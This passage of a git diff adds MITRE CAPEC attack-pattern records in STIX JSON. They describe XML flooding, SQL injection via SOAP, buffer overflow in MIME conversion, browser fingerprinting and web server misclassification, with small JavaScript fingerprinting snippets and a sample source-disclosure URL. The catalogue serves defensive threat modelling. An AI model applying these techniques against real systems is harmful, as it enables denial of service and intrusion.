], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "The attacker, knowing the victim runs email on a system adjacent to the IDE system, sends a phishing email with a malicious attachment to the victim. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent IDE system from the victim's workstation. The attacker is then able to exfiltrate sensitive data about the software being developed on the IDE system." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).", + "The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.", + "The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure." + ], + "x_capec_skills_required": { + "High": "Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)", + "Medium": "Intelligence about the manufacturer's operating environment and infrastructure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--dd79f192-635b-43ef-96d2-17548fa8c917.json b/capec/attack-pattern/attack-pattern--dd79f192-635b-43ef-96d2-17548fa8c917.json new file mode 100644 index 0000000000..32320c6d43 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--dd79f192-635b-43ef-96d2-17548fa8c917.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--e1b38a4f-ee0f-4aa1-bf03-2f176862f4e7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--dd79f192-635b-43ef-96d2-17548fa8c917", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XML Ping of the Death", + "description": "An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/147.html", + "external_id": "CAPEC-147" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html", + "external_id": "CWE-400" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (DoS: resource consumption (other))" + ] + }, + "x_capec_example_instances": [ + "Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must receive and process XML transactions." + ], + "x_capec_resources_required": [ + "Transaction generator(s)/source(s) and ability to cause arrival of messages at the target with sufficient rapidity to overload target. Larger targets may be able to handle large volumes of requests so the attacker may require significant resources (such as a distributed network) to affect the target. However, the resources required of the attacker would be less than in the case of a simple flooding attack against the same target." + ], + "x_capec_skills_required": { + "High": "To use distributed network to launch the attack", + "Low": "To send small XML messages" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d.json b/capec/attack-pattern/attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d.json new file mode 100644 index 0000000000..6a64245c9b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--8ff660f3-cd9e-4a99-b1df-854d8b7d2cd2", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "SQL Injection through SOAP Parameter Tampering", + "description": "An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/110.html", + "external_id": "CAPEC-110" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html", + "external_id": "CWE-89" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "An attacker uses a travel booking system that leverages SOAP communication between the client and the travel booking service. An attacker begins to tamper with the outgoing SOAP messages by modifying their parameters to include characters that would break a dynamically constructed SQL query. He notices that the system fails to respond when these malicious inputs are injected in certain parameters transferred in a SOAP message. The attacker crafts a SQL query that modifies his payment amount in the travel system's database and passes it as one of the parameters . A backend batch payment system later fetches the payment amount from the database (the modified payment amount) and sends to the credit card processor, enabling the attacker to purchase the airfare at a lower price. An attacker needs to have some knowledge of the system's database, perhaps by exploiting another weakness that results in information disclosure." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "SOAP messages are used as a communication mechanism in the system", + "SOAP parameters are not properly validated at the service provider", + "The service provider does not properly utilize parameter binding when building SQL queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "If the attacker has to perform SQL injection blindly", + "Medium": "If the attacker is able to gain good understanding of the system's database schema" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--dfd3ae57-19df-41b6-b86c-391733a6db86.json b/capec/attack-pattern/attack-pattern--dfd3ae57-19df-41b6-b86c-391733a6db86.json new file mode 100644 index 0000000000..4c5df5acd9 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--dfd3ae57-19df-41b6-b86c-391733a6db86.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--70406e20-80e4-4ac4-a4c4-e86122883f01", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--dfd3ae57-19df-41b6-b86c-391733a6db86", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Signature Spoofing by Misrepresentation", + "description": "An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/476.html", + "external_id": "CAPEC-476" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html", + "external_id": "CWE-290" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Eric Johanson, The state of homograph attacks, 2005--02---11, http://www.shmoo.com/idn/homograph.txt", + "external_id": "REF-414" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Recipient is using signature verification software that does not clearly indicate potential homographs in the signer identity.Recipient is using signature verification software that contains a parsing vulnerability, or allows control characters in the signer identity field, such that a signature is mistakenly displayed as valid and from a known or authoritative signer." + ], + "x_capec_skills_required": { + "High": "Attacker may be required to create malformed data blobs and know how to insert them in a location that the recipient will visit." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e025c9dc-4e29-4c77-a39b-1a448ea12445.json b/capec/attack-pattern/attack-pattern--e025c9dc-4e29-4c77-a39b-1a448ea12445.json new file mode 100644 index 0000000000..eba8f542dc --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e025c9dc-4e29-4c77-a39b-1a448ea12445.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--6164eb98-353b-46d5-852f-0707352c50df", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e025c9dc-4e29-4c77-a39b-1a448ea12445", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Browser Fingerprinting", + "description": "An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/472.html", + "external_id": "CAPEC-472" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gareth Heyes, Detecting browsers javascript hacks, The Spanner, 2009--01---29", + "url": "http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/", + "external_id": "REF-410" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "\n The following code snippets can be used to detect various browsers:\n \n Firefox 2/3\n FF=/a/[-1]=='a'\n Firefox 3\n FF3=(function x(){})[-5]=='x'\n Firefox 2\n FF2=(function x(){})[-6]=='x'\n IE\n IE='\\v'=='v'\n Safari\n Saf=/a/.__proto__=='//'\n Chrome\n Chr=/source/.test((/a/.toString+''))\n Opera\n Op=/^function \\(/.test([].sort)\n \n " + ], + "x_capec_prerequisites": [ + "Victim's browser visits a website that contains attacker's Java ScriptJava Script is not disabled in the victim's browser" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e0f92905-0ef0-4a8b-b495-e21b52b45899.json b/capec/attack-pattern/attack-pattern--e0f92905-0ef0-4a8b-b495-e21b52b45899.json new file mode 100644 index 0000000000..f9de35657f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e0f92905-0ef0-4a8b-b495-e21b52b45899.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--b936c730-c6dc-45aa-9c13-bb8c350addc2", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e0f92905-0ef0-4a8b-b495-e21b52b45899", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Documentation Alteration to Circumvent Dial-down", + "description": "An attacker with access to a manufacturer's documentation, which include descriptions of advanced technology and/or specific components' criticality, alters the documents to circumvent dial-down functionality requirements. This alteration would change the interpretation of implementation and manufacturing techniques, allowing for advanced technologies to remain in place even though these technologies might be restricted to certain customers, such as nations on the terrorist watch list, giving the attacker on the receiving end of a shipped product access to an advanced technology that might otherwise be restricted.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/517.html", + "external_id": "CAPEC-517" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "A product for manufacture exists that contains advanced cryptographic capabilities, including algorithms that are restricted from being shipped to some nations. An attacker from one of the restricted nations alters the documentation to ensure that when the product is manufactured for shipment to a restricted nation, the software compilation steps that normally would prevent the advanced cryptographic capabilities from being included are actually included. When the product is shipped to the attacker's home country, the attacker is able to retrieve and/or use the advanced cryptographic capabilities." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of internal software and hardware components within manufacturer's development environment.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e2036f8f-24fd-4045-a3a6-f74bd0e5cc0f.json b/capec/attack-pattern/attack-pattern--e2036f8f-24fd-4045-a3a6-f74bd0e5cc0f.json new file mode 100644 index 0000000000..0566072fdd --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e2036f8f-24fd-4045-a3a6-f74bd0e5cc0f.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--07e7bc17-9ced-45b8-913d-4f9d69cba265", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e2036f8f-24fd-4045-a3a6-f74bd0e5cc0f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Cause Web Server Misclassification", + "description": "An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process. This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker's job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/11.html", + "external_id": "CAPEC-11" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/430.html", + "external_id": "CWE-430" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Orion Application Server JSP Source Disclosure Vulnerability (Bugtraq ID: 17204), SecurityFocus", + "url": "http://www.securityfocus.com/bid/17204/info", + "external_id": "REF-6" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "\n J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers' web browser.\n http://victim.site/login.jsp.\n Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue.\n [R.11.2]\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Web server software must rely on file name or file extension for processing.", + "The attacker must be able to make HTTP requests to the web server." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "To modify file name or file extension", + "Medium": "To use misclassification to force the Web server to disclose configuration information, source, or binary data" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e2589b81-3fc0-4d42-ae48-f6825433bff3.json b/capec/attack-pattern/attack-pattern--e2589b81-3fc0-4d42-ae48-f6825433bff3.json new file mode 100644 index 0000000000..809f44d149 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e2589b81-3fc0-4d42-ae48-f6825433bff3.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--c32c96f6-8dfb-467f-970f-328b36f67a02", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e2589b81-3fc0-4d42-ae48-f6825433bff3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-09-30T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "File Discovery", + "description": "An adversary engages in probing and exploration activities to determine if common key files exists. Such files often contain configuration and security parameters of the targeted application, system or network. Using this knowledge may often pave the way for more damaging attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/497.html", + "external_id": "CAPEC-497" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must know the location of these common key files." + ], + "x_capec_resources_required": [ + "" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e301dc35-2869-454b-bcda-8f663dd370fd.json b/capec/attack-pattern/attack-pattern--e301dc35-2869-454b-bcda-8f663dd370fd.json new file mode 100644 index 0000000000..21e99bda0a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e301dc35-2869-454b-bcda-8f663dd370fd.json @@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--548ae478-2c91-4ddf-97e5-884cdc3d2960", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e301dc35-2869-454b-bcda-8f663dd370fd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "MIME Conversion", + "description": "An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/42.html", + "external_id": "CAPEC-42" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html", + "external_id": "CWE-119" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "CERT Advisory CA-1997-05 MIME Conversion Buffer Overflow in Sendmail Versions 8.8.3 and 8.8.4, Software Engineering Institute: Carnegie Mellon University", + "url": "http://www.cert.org/advisories/CA-1997-05.html", + "external_id": "REF-364" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: Sendmail Overflow\n A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can overflow a buffer and execute arbitrary commands on the system with root privileges.\n Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild.See also: CVE-1999-0047" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target system uses a mail server.", + "Mail server vendor has not released a patch for the MIME conversion routine, the patch itself has a security hole or does not fix the original problem, or the patch has not been applied to the user's system." + ], + "x_capec_skills_required": { + "High": "Causing arbitrary code to execute on the target system.", + "Low": "It may be trivial to cause a DoS via this attack pattern" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e372df87-d117-476a-907d-0372310c2414.json b/capec/attack-pattern/attack-pattern--e372df87-d117-476a-907d-0372310c2414.json new file mode 100644 index 0000000000..91741fa492 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e372df87-d117-476a-907d-0372310c2414.json @@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--9fb159b7-108f-46e6-b578-0e0c7456ae06", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e372df87-d117-476a-907d-0372310c2414", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "XML Nested Payloads", + "description": "Applications often need to transform data in and out of the XML format by using an XML parser. It may be possible for an adversary to inject data that may have an adverse effect on the XML parser when it is being processed. By nesting XML data and causing this data to be continuously self-referential, an adversary can cause the XML parser to consume more resources while processing, causing excessive memory consumption and CPU utilization. An adversary's goal is to leverage parser failure to his or her advantage. In most cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing. However it may be possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [R.230.1]. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/230.html", + "external_id": "CAPEC-230" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/112.html", + "external_id": "CWE-112" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/19.html", + "external_id": "CWE-19" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/674.html", + "external_id": "CWE-674" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Shlomo, Yona, XML Parser Attacks: A summary of ways to attack an XML Parser, 2007", + "url": "http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html", + "external_id": "REF-89" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An application uses an XML parser to perform transformation on user-controllable data.", + "An application does not perform sufficient validation to ensure that user-controllable data is safe for an XML parser." + ], + "x_capec_skills_required": { + "High": "Arbitrary code execution", + "Low": "Denial of service" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e3a9da59-fe22-4b97-b493-ffad8011fed6.json b/capec/attack-pattern/attack-pattern--e3a9da59-fe22-4b97-b493-ffad8011fed6.json new file mode 100644 index 0000000000..d3fa8f3073 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e3a9da59-fe22-4b97-b493-ffad8011fed6.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--61f973b3-f662-403a-bb47-2ab0fa0939fe", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e3a9da59-fe22-4b97-b493-ffad8011fed6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Directory Traversal", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-126 : Path Traversal\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/213.html", + "external_id": "CAPEC-213" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e3fe16e1-24d6-49f4-8a4e-ed8a4ded4d53.json b/capec/attack-pattern/attack-pattern--e3fe16e1-24d6-49f4-8a4e-ed8a4ded4d53.json new file mode 100644 index 0000000000..5835a39111 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--e3fe16e1-24d6-49f4-8a4e-ed8a4ded4d53.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--b7b255d3-f5f2-4bb3-97e2-8e5dc9b857be", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--e3fe16e1-24d6-49f4-8a4e-ed8a4ded4d53", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "WebView Injection", + "description": "An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/500.html", + "external_id": "CAPEC-500" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, Heng Yin, Attacks on WebView in the Android System, 2011, Annual Computer Security Applications Conference (ACSAC)", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf", + "external_id": "REF-430" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the device and convince the user to execute it. The malicious application is designed to target a specific web application and is used to load the target web pages via the WebView component. For example, an adversary may develop an application that interacts with Facebook via WebView and adds a new feature that a user desires. The user would install this 3rd party app instead of the Facebook app." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4.json b/capec/attack-pattern/attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4.json new file mode 